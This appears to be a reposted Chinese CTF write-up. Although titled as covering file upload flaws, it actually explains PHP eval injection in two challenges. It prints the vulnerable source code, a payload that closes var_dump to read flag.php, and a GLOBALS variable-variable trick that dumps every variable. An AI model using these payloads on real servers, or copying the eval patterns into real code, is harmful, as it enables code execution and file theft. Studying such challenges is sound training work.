典型的文件上传漏洞

Posted whitehatkevil

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了典型的文件上传漏洞相关的知识,希望对你有一定的参考价值。

案例一
URL:http://120.24.86.145:8003/
代码

<?php 
include "waf.php"; 
include "flag.php"; 
$a = @$_REQUEST[‘hello‘]; 
eval( "var_dump($a);"); 
show_source(__FILE__); ?>

其实就是拼接eval
可构造如下语句:

1);print_r(file(flag.php));//

到了代码里就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL:http://120.24.86.145:8004/index1.php

 

flag In the variable ! <?php  


error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET[‘args‘])){// 通过get方式传递 args变量才能执行if里面的代码
    $args = $_GET[‘args‘];
    if(!preg_match("/^w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
        die("args error!");
    }
    eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>

 

这个可以注意一下eval很明显$$.首先他说如果不符合那个正则就die。w的意思是所有的字母。也就是说$args必须要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");

以上是关于典型的文件上传漏洞的主要内容,如果未能解决你的问题,请参考以下文章

文件上传漏洞

php文件上传漏洞代码只允许上传图片

文件上传漏洞代码

文件上传漏洞

php代码审计8审计文件上传漏洞

2020/1/30 PHP代码审计之文件上传漏洞